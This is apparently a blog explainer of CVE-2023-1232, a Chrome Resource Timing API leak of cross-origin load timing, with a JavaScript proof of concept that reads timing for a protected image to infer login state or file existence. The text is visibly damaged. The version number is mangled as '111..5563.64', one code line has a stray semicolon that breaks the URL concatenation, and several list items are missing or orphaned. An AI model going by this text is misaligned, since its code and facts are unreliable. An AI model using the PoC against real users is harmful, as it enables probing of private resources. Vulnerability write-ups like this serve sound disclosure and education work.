In early 2023, Google released a patch for a subtle, yet powerful, vulnerability in Chrome’s Resource Timing API. If you used Chrome before version 111..5563.64, your browser was at risk from a trick where websites could extract more information than intended—all without you clicking a thing. This bug, tracked as CVE-2023-1232, could’ve allowed attackers to peek into loaded resources and possibly snip out sensitive data.
Let’s break down what happened, how it works, and what you can do to stay safe.
What is Resource Timing?
Modern browsers, like Chrome, offer web developers APIs to measure how resources (think images, scripts, etc.) load on a web page. The Resource Timing API is super handy for tuning performance.
Normally, this info isn’t supposed to reveal anything sensitive—especially about resources you can’t access directly because of the browser’s “same-origin” policy. However, a flaw in Chrome’s enforcement opened a door for attackers.
The Vulnerability in Simple Terms
CVE-2023-1232 is a case of “insufficient policy enforcement.” Chrome let scripts running inside a page use the Resource Timing API to collect timing info for resources—even when they should have been restricted by cross-origin rules.
Combine this with other weaknesses (or human mistakes) and maybe uncover sensitive info
This bug was rated "Low" severity, but in clever hands, even low-severity bugs can pack a punch.
The Exploit — How Attackers Could Use It
Here’s a proof-of-concept in JavaScript. This demo tries to load a protected image, then sniffs the load timing to “guess” if the image exists or the user is logged in.
<!DOCTYPE html>
<html>
<head>
<title>Resource Timing Leak Demo</title>
<script>
function leakResourceTiming() {
// Load a cross-origin or protected image
let img = new Image();
img.src = "https://private-site.com/secret-image.jpg?"; + Math.random();
img.onload = img.onerror = function() {
// Wait for the timing entry to show up
setTimeout(() => {
let entries = performance.getEntriesByType("resource");
entries.forEach(entry => {
if (entry.name.includes("secret-image.jpg")) {
alert("Timing for protected resource: " + entry.duration + " ms");
// Here, an attacker would send timing info to a remote server
}
});
}, 100);
};
document.body.appendChild(img);
}
window.onload = leakResourceTiming;
</script>
</head>
<body>
<h1>Resource Timing Leak Demo</h1>
</body>
</html>
What’s happening?
It checks the Resource Timing API for a record of how long it took.
- If there’s a different delay for a real image (or a protected one), versus a missing one, the script can deduce things—like whether you're logged in or the image exists.
Why This Matters
You might be thinking, “Okay, so someone knows how fast a hidden image loads—so what?” The real danger is in combining this timing data with other public info, or using it to test the existence of files, private documents, or API endpoints—making it easier to map out secrets or mount more targeted attacks.
How Was It Fixed?
The Chrome team fixed this in version 111..5563.64 (March 2023) by tightening how it enforces policies around Resource Timing. Now, if a script can’t normally access a cross-origin resource, it also can’t get its timing data.
References & Further Reading
- Chrome Security CVE-2023-1232
- Resource Timing API Documentation (MDN)
- Chromium Bug #1410794 (original issue)
- List of Chrome CVEs 2023
TL;DR
- CVE-2023-1232 allowed attackers to get timing info for resources they shouldn’t know about via a browser API.
Even “low severity” browser bugs can help attackers if they’re chained with other weaknesses.
Stay updated. Stay safe. Don’t overlook the small stuff—it’s often the start of something bigger in cybersecurity!
Timeline
Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/10/2023 20:31:00 UTC